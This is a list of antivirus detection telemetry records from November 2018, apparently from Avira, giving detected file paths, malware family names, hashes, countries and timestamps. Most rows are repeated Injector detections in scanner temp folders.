  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='c:\\users\\X\\downloads\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T18:20:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='D:\\TMP\\ForSandbox\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T21:35:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052815-11467726', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052815-11467726', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122551-98d97bf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122551-98D97BF7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:28:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053104-7639fee9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053104-7639FEE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061129-1b95e7a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061129-1B95E7A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053609-2c38213e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053609-2C38213E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062554-1f1a5377', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062554-1F1A5377', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054621-98b54fbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054621-98B54FBD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054751-ce56df55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054751-CE56DF55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051348-0cddb06d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051348-0CDDB06D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054659-af976b75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054659-AF976B75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061035-fb398297', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061035-FB398297', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061826-14806bd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061826-14806BD3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051818-adee98d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051818-ADEE98D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053942-ab35beb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053942-AB35BEB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061612-c444b93a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061612-C444B93A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061708-e5788787', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061708-E5788787', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062153-8fa08100', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062153-8FA08100', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061110-10a32840', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061110-10A32840', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052958-4ee814e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052958-4EE814E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061947-44654dd1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061947-44654DD1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052411-800e8f71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052411-800E8F71', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061150-284da5d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061150-284DA5D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061747-fd18963e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061747-FD18963E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054549-85a31e5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054549-85A31E5E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061907-2ce73628', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061907-2CE73628', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061043-0022a8ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061043-0022A8EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054824-e211c8f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054824-E211C8F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='biz #456rzh.doc', filepath='\\\\?\\C:\\Datos\\Downloads\\BIZ #456RZH.doc', filesize=80000, name='VBA/Dldr.Agent.aaswx.#M1.#R1'), hash='776185eef8a2255db2ba279664116ed0038be86bedb5caf6849c1e93786667c3', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:13:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055453-ca224770', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055453-CA224770', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T23:01:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8a09a30645885737b1b40007c9da1460bfcebb22fa369cf17f9de8f8efe37345', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T18:10:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053523-10c48ee9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053523-10C48EE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054833-e7b9be29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054833-E7B9BE29', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060658-7a37c299', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060658-7A37C299', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062209-993ef64b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062209-993EF64B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055950-7aefee93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055950-7AEFEE93', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055706-19505456', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055706-19505456', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050554-f2164099', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050554-F2164099', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T21:14:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060012-87ec4b01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060012-87EC4B01', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054326-3040d37d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054326-3040D37D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050521-de810003', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050521-DE810003', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055501-ce8bca85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055501-CE8BCA85', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062143-898ac870', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062143-898AC870', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060926-d299b5cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060926-D299B5CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062646-3e75801f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062646-3E75801F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055847-556f2054', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055847-556F2054', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053451-fddd4671', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053451-FDDD4671', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:24:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055718-204c9846', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055718-204C9846', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3794540\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Programs\\FFSetup4.4.0.0.exe', parentsize=66971904, timestamp='2018-11-01T13:27:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154935-80e5af33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154935-80E5AF33', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:36Z'), dt=datetime.date(2018, 11, 1)),
